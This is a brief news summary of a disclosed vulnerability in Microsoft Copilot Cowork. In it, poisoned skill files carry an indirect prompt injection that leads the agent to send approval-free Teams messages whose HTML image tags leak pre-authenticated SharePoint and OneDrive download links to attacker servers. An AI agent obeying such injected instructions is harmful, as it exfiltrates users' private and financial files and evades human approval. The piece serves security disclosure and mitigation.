Security researchers discovered a critical vulnerability in Microsoft Copilot Cowork that allows attackers to steal files from Microsoft 365 tenants. The attack exploits indirect prompt injection through poisoned skill files, leveraging the agent's ability to send Teams messages without human approval when the recipient is the active user.

When users open compromised messages containing malicious HTML image tags, pre-authenticated download links for SharePoint and OneDrive files are automatically exfiltrated to attacker-controlled servers. This affects files containing PII and financial data that users have legitimate access to. The vulnerability works across multiple AI models including Claude Opus 4.7, achieving 100% success rate in testing.

Microsoft's design decision to bypass approval prompts for self-directed communications creates this attack surface. Organizations can mitigate risks by restricting file download permissions through SharePoint policies, though this limits functionality. The research highlights broader concerns about agentic AI systems with enterprise-wide permissions, where seemingly benign capabilities become dangerous when combined.

Scheduled tasks amplify the threat by executing malicious workflows without user oversight. Researchers emphasize that this represents a systemic design issue rather than an isolated bug, underscoring the need for careful permission management in AI agent deployments.